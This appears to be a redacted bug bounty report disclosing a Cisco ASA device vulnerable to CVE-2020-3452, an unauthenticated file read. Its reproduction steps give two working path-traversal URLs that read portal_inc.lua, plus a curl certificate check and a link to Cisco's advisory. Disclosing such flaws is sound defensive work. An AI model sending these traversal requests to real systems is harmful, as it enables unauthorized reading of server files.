[CVE-2020-3452] Unauthenticated file read in Cisco ASA

i found out that https://█████/ was vulnerable to CVE-2020-3452 The IP has a SSL certificate pointing to ██████████ curl -kv https://███████/ Output; ``` Server certificate: ███ ``` ## Impact Anyone can read any file present on the server. ## System Host(s) █████ ## Affected Product(s) and Version(s) ## CVE Numbers CVE-2020-3452 ## Steps to Reproduce You can test it by visiting the URL: 1. https://█████████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua 2. https://█████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ ## Suggested Mitigation/Remediation Actions https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86